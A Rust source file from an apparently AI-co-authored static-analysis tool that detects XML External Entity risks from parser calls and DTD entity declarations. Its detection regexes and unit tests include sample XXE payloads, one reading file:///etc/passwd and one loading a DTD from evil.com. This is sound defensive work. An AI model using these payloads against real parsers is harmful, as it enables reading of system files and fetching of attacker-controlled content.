Complete Aphoria claims system overhaul: - A1: Rename ExtractedClaim to Observation (extractors produce observations, not claims) - A2: Add AuthoredClaim with full provenance, invariants, and authority tiers - A3: Verify engine comparing observations against authored claims, CLI + formatters - A4: Corpus as first-class assertions with predicate indexing, authority lens, trust packs - A5: Coverage analysis, explain/docs generation, self-audit extractor, claim suggester skill Also includes: 42 extractors updated for Observation type, verifiable_predicates trait, conflict detection with comparison modes, claims TOML persistence, Grafana dashboard, backup/restore scripts, and comprehensive test coverage. Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
433 lines
14 KiB
Rust
433 lines
14 KiB
Rust
//! XML External Entity (XXE) vulnerability extractor.
|
|
//!
|
|
//! Detects patterns where XML parsers are used without disabling external entity
|
|
//! processing, which can lead to data exfiltration, SSRF, or denial of service.
|
|
|
|
use regex::Regex;
|
|
use stemedb_core::types::ObjectValue;
|
|
|
|
use super::traits::{build_claim, Extractor};
|
|
use crate::types::{Observation, Language};
|
|
|
|
/// Extractor for XXE vulnerabilities.
|
|
///
|
|
/// Detects patterns indicating potentially unsafe XML parsing:
|
|
/// - Python: lxml, xml.etree, xml.dom.minidom, xml.sax
|
|
/// - JavaScript: xml2js, libxmljs
|
|
/// - Go: encoding/xml
|
|
/// - Java-style patterns (polyglot detection)
|
|
/// - DTD entity declarations
|
|
pub struct XxeExtractor {
|
|
// Python patterns
|
|
python_lxml: Regex,
|
|
python_etree: Regex,
|
|
python_minidom: Regex,
|
|
python_sax: Regex,
|
|
|
|
// JavaScript patterns
|
|
js_xml2js: Regex,
|
|
js_libxmljs: Regex,
|
|
|
|
// Go patterns
|
|
go_xml: Regex,
|
|
|
|
// Java-style patterns
|
|
java_xxe: Regex,
|
|
|
|
// DTD entity declaration
|
|
entity_decl: Regex,
|
|
}
|
|
|
|
impl Default for XxeExtractor {
|
|
fn default() -> Self {
|
|
Self::new()
|
|
}
|
|
}
|
|
|
|
impl XxeExtractor {
|
|
/// Create a new XXE extractor with compiled regexes.
|
|
///
|
|
/// # Panics
|
|
/// Panics if any regex pattern is invalid (programmer error).
|
|
#[allow(clippy::expect_used)]
|
|
pub fn new() -> Self {
|
|
Self {
|
|
// Python: lxml/etree parse
|
|
python_lxml: Regex::new(r#"(?:etree|lxml)\.(?:parse|fromstring|XML)\s*\("#)
|
|
.expect("valid regex"),
|
|
|
|
// Python: xml.etree.ElementTree
|
|
python_etree: Regex::new(
|
|
r#"(?:xml\.etree\.ElementTree|ET)\.(?:parse|fromstring|XMLParser)\s*\("#,
|
|
)
|
|
.expect("valid regex"),
|
|
|
|
// Python: xml.dom.minidom
|
|
python_minidom: Regex::new(r#"xml\.dom\.minidom\.(?:parse|parseString)\s*\("#)
|
|
.expect("valid regex"),
|
|
|
|
// Python: xml.sax
|
|
python_sax: Regex::new(r#"xml\.sax\.(?:parse|parseString|make_parser)\s*\("#)
|
|
.expect("valid regex"),
|
|
|
|
// JavaScript: xml2js
|
|
js_xml2js: Regex::new(r#"xml2js\.(?:parseString|Parser)\s*\("#).expect("valid regex"),
|
|
|
|
// JavaScript: libxmljs
|
|
js_libxmljs: Regex::new(r#"libxmljs\.parseXml\s*\("#).expect("valid regex"),
|
|
|
|
// Go: encoding/xml
|
|
go_xml: Regex::new(r#"xml\.(?:Unmarshal|NewDecoder)\s*\("#).expect("valid regex"),
|
|
|
|
// Java-style patterns (polyglot detection in config files, etc.)
|
|
java_xxe: Regex::new(
|
|
r#"(?:DocumentBuilder|SAXParser|XMLReader|TransformerFactory)(?:Factory)?\.new"#,
|
|
)
|
|
.expect("valid regex"),
|
|
|
|
// DTD entity declaration (dangerous in untrusted XML)
|
|
entity_decl: Regex::new(r#"<!ENTITY\s+(?:%\s+)?\w+\s+(?:SYSTEM|PUBLIC)"#)
|
|
.expect("valid regex"),
|
|
}
|
|
}
|
|
|
|
fn make_claim(
|
|
path_segments: &[String],
|
|
file: &str,
|
|
line: usize,
|
|
matched: &str,
|
|
parser: &str,
|
|
confidence: f32,
|
|
description: &str,
|
|
) -> Observation {
|
|
build_claim(
|
|
path_segments,
|
|
&["xml", "parsing"],
|
|
"parser_config",
|
|
ObjectValue::Text(parser.to_string()),
|
|
file,
|
|
line,
|
|
matched,
|
|
confidence,
|
|
description,
|
|
)
|
|
}
|
|
}
|
|
|
|
impl Extractor for XxeExtractor {
|
|
fn name(&self) -> &str {
|
|
"xxe"
|
|
}
|
|
|
|
fn languages(&self) -> &[Language] {
|
|
&[Language::Python, Language::JavaScript, Language::TypeScript, Language::Go]
|
|
}
|
|
|
|
fn extract(
|
|
&self,
|
|
path_segments: &[String],
|
|
content: &str,
|
|
language: Language,
|
|
file: &str,
|
|
) -> Vec<Observation> {
|
|
let mut claims = Vec::new();
|
|
|
|
for (line_idx, line) in content.lines().enumerate() {
|
|
let line_num = line_idx + 1;
|
|
|
|
// Check for DTD entity declarations (high risk in any context)
|
|
if let Some(m) = self.entity_decl.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"dtd_entity",
|
|
0.95,
|
|
"DTD SYSTEM/PUBLIC entity declaration (XXE attack vector)",
|
|
));
|
|
}
|
|
|
|
match language {
|
|
Language::Python => {
|
|
// lxml/etree (can be safe with proper configuration)
|
|
if let Some(m) = self.python_lxml.find(line) {
|
|
// Lower confidence if defusedxml is imported or resolve_entities=False
|
|
let confidence = if content.contains("defusedxml")
|
|
|| line.contains("resolve_entities=False")
|
|
{
|
|
0.5
|
|
} else {
|
|
0.85
|
|
};
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"lxml",
|
|
confidence,
|
|
"lxml XML parsing may be vulnerable to XXE without proper config",
|
|
));
|
|
}
|
|
|
|
// xml.etree.ElementTree
|
|
if let Some(m) = self.python_etree.find(line) {
|
|
// Python 3.8+ has some protections, but external entities still a concern
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"elementtree",
|
|
0.75,
|
|
"xml.etree.ElementTree may allow external entity expansion",
|
|
));
|
|
}
|
|
|
|
// xml.dom.minidom (vulnerable by default)
|
|
if let Some(m) = self.python_minidom.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"minidom",
|
|
0.85,
|
|
"xml.dom.minidom is vulnerable to XXE attacks",
|
|
));
|
|
}
|
|
|
|
// xml.sax (needs feature flags to be safe)
|
|
if let Some(m) = self.python_sax.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"sax",
|
|
0.85,
|
|
"xml.sax is vulnerable to XXE without feature_external_ges=False",
|
|
));
|
|
}
|
|
}
|
|
Language::JavaScript | Language::TypeScript => {
|
|
// xml2js (generally safer, but can be misconfigured)
|
|
if let Some(m) = self.js_xml2js.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"xml2js",
|
|
0.7,
|
|
"xml2js XML parsing - verify external entity settings",
|
|
));
|
|
}
|
|
|
|
// libxmljs (can be vulnerable)
|
|
if let Some(m) = self.js_libxmljs.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"libxmljs",
|
|
0.85,
|
|
"libxmljs may be vulnerable to XXE attacks",
|
|
));
|
|
}
|
|
}
|
|
Language::Go => {
|
|
// encoding/xml (safer by default, but DTD expansion can be issue)
|
|
if let Some(m) = self.go_xml.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"encoding_xml",
|
|
0.65,
|
|
"Go xml package - generally safe but verify with untrusted input",
|
|
));
|
|
}
|
|
}
|
|
_ => {}
|
|
}
|
|
|
|
// Check for Java patterns (polyglot detection)
|
|
if let Some(m) = self.java_xxe.find(line) {
|
|
claims.push(Self::make_claim(
|
|
path_segments,
|
|
file,
|
|
line_num,
|
|
m.as_str(),
|
|
"java_parser",
|
|
0.9,
|
|
"Java XML parser - requires feature flags to prevent XXE",
|
|
));
|
|
}
|
|
}
|
|
|
|
claims
|
|
}
|
|
}
|
|
|
|
#[cfg(test)]
mod tests {
    use super::*;

    /// Runs a freshly built extractor over `source`, using `segment` as the
    /// only path segment.
    fn scan(segment: &str, source: &str, language: Language, file: &str) -> Vec<Observation> {
        let extractor = XxeExtractor::new();
        extractor.extract(&[segment.to_string()], source, language, file)
    }

    #[test]
    fn test_python_lxml() {
        let source = r#"
doc = etree.parse(xml_file)
"#;

        let found = scan("python", source, Language::Python, "parser.py");

        assert_eq!(found.len(), 1);
        assert!(found[0].concept_path.contains("xml/parsing"));
    }

    #[test]
    fn test_python_lxml_with_defusedxml() {
        let source = r#"
import defusedxml.ElementTree as ET
doc = etree.parse(xml_file)
"#;

        let found = scan("python", source, Language::Python, "parser.py");

        // Still reported, but the defusedxml mention lowers the confidence.
        assert_eq!(found.len(), 1);
        assert!(found[0].confidence < 0.6);
    }

    #[test]
    fn test_python_elementtree() {
        let source = r#"
import xml.etree.ElementTree as ET
tree = ET.parse(source)
"#;

        let found = scan("python", source, Language::Python, "xml.py");

        assert_eq!(found.len(), 1);
    }

    #[test]
    fn test_python_minidom() {
        let source = r#"
from xml.dom.minidom import parse
doc = xml.dom.minidom.parse(xml_string)
"#;

        let found = scan("python", source, Language::Python, "parser.py");

        assert_eq!(found.len(), 1);
        assert!(found[0].description.contains("minidom"));
    }

    #[test]
    fn test_python_sax() {
        let source = r#"
xml.sax.parse(source, handler)
"#;

        let found = scan("python", source, Language::Python, "handler.py");

        assert_eq!(found.len(), 1);
    }

    #[test]
    fn test_js_xml2js() {
        let source = r#"
xml2js.parseString(xmlData, callback);
"#;

        let found = scan("js", source, Language::JavaScript, "parser.js");

        assert_eq!(found.len(), 1);
    }

    #[test]
    fn test_js_libxmljs() {
        let source = r#"
const doc = libxmljs.parseXml(xmlString);
"#;

        let found = scan("js", source, Language::JavaScript, "parser.js");

        assert_eq!(found.len(), 1);
    }

    #[test]
    fn test_go_xml() {
        let source = r#"
err := xml.Unmarshal(data, &result)
"#;

        let found = scan("go", source, Language::Go, "parser.go");

        assert_eq!(found.len(), 1);
    }

    #[test]
    fn test_java_parser() {
        let source = r#"
DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
"#;

        // Java-style patterns are checked regardless of the file's language.
        let found = scan("python", source, Language::Python, "mixed.py");

        assert_eq!(found.len(), 1);
        assert!(found[0].description.contains("Java"));
    }

    #[test]
    fn test_dtd_entity() {
        let source = r#"
<!ENTITY xxe SYSTEM "file:///etc/passwd">
"#;

        // Use a non-test filename to avoid confidence reduction
        let found = scan("python", source, Language::Python, "parser.xml");

        assert_eq!(found.len(), 1);
        assert!(found[0].confidence >= 0.9);
        assert!(found[0].description.contains("XXE attack vector"));
    }

    #[test]
    fn test_dtd_public_entity() {
        let source = r#"
<!ENTITY % remote PUBLIC "http://evil.com/evil.dtd">
"#;

        let found = scan("python", source, Language::Python, "test.xml");

        assert_eq!(found.len(), 1);
    }
}
|